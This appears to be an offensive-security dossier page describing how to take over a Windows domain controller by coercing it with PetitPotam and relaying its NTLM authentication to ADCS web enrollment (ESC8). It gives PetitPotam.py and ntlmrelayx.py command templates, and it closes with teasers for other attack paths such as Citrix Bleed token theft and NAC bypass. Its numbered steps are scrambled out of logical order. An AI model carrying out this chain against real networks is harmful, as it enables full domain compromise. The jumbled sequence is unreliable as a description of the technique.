PetitPotam + ADCS ESC8 → Domain Controller takeover

§ Context

Assumed environment: a Certificate Authority with HTTP/HTTPS web enrollment enabled (Certsrv) is reachable from the attacker, NTLM is not blocked on that endpoint, and EFSRPC (or another coercion RPC) is exposed on the DC.

§ Steps

1. 01
   Low-priv domain userInitial Access

   T1078— Valid Accounts
2. 02
   PKINIT auth as DC$Lateral Movement

   T1550.003— Pass the Ticket

   Recover the DC's NT hash via UnPAC-the-hash or directly request a TGT.

3. 03
   Coerce DC via PetitPotamInitial Access

   AD-COERCE— Authentication Coercion

   PetitPotam.py <listener_ip> <dc_ip>

4. 04
   DCSync via DC machine accountCredential Access

   T1003.006— DCSync
5. 05
   Start ntlmrelayx → CA web enrollmentCredential Access

   T1557.001— LLMNR/NBT-NS Poisoning and SMB Relay

   ntlmrelayx.py -t http://<ca>/certsrv/certfnsh.asp --adcs --template DomainController

6. 06
   DC cert issued via ESC8Credential Access

   AD-ESC8— ADCS ESC8 — HTTP Web Enrollment NTLM Relay

§ References

• T1078Valid Accounts
• T1550.003Pass the Ticket
• T1003.006DCSync
• T1557.001LLMNR/NBT-NS Poisoning and SMB Relay

§ Frequently asked

What is the "PetitPotam + ADCS ESC8 → Domain Controller takeover" attack path?

Coerce a DC's machine account to authenticate to the attacker, relay that NTLM to the ADCS HTTP web-enrollment endpoint, and obtain a DC certificate for full domain compromise. It chains 6 steps drawn from real-world offensive-security techniques.

What starting position does this attack require?

The first step is Low-priv domain user (T1078) — a initial access primitive. Assumed environment: a Certificate Authority with HTTP/HTTPS web enrollment enabled (Certsrv) is reachable from the attacker, NTLM is not blocked on that endpoint, and EFSRPC (or another coercion RPC) is exposed on the DC.

What is the final impact of this kill-chain?

The final step lands on DC cert issued via ESC8 (AD-ESC8), which falls under Credential Access. From here, an operator typically pivots into post-exploitation or maintains persistence.

How can defenders detect or prevent this attack?

Detection and prevention vary per step. Refer to each linked MITRE ATT&CK entry under "References" — every technique on that page lists defensive controls, detection telemetry, and known threat-actor usage.

§ Related dossiers

• Shared techniques4

  mitm6 IPv6 SLAAC → NTLM relay → DA

  Even when IPv4 is hardened, Windows clients prefer IPv6 with default DHCPv6. mitm6 makes the attacker the IPv6 DNS server, advertises wpad, and relays the captured NTLM to LDAPS for RBCD.

• Shared techniques4

  Unconstrained delegation → Capture DC TGT → DCSync

  Compromise a host with TRUSTED_FOR_DELEGATION, coerce a DC to authenticate to it, harvest the DC's TGT from its LSASS, then DCSync.

• Shared techniques3

  ADCS ESC11 → certificate via RPC (no web enrollment)

  When the CA's ICertPassage RPC interface allows NTLM without signing, relay any coerced auth directly to RPC and obtain a cert — bypasses HTTP-only mitigations.

• Shared techniques3

  ADCS ESC1 → Domain Admin

  A low-priv domain user discovers a certificate template that lets enrollees supply an arbitrary subjectAltName, enrolls a cert as Administrator, and authenticates via PKINIT.

• Shared techniques2

  Citrix Bleed → steal authenticated session → MFA bypass

  Send a long Host header to a vulnerable NetScaler — memory disclosure leaks an authenticated session token already past MFA. Replay the token to log into the corporate VPN.

• Shared techniques2

  802.1X NAC bypass via printer MAC spoof

  Plug into the LAN, sniff a printer / IP-phone MAC, clone it on your laptop, get full LAN access via MAC-Auth-Bypass — bypass NAC entirely.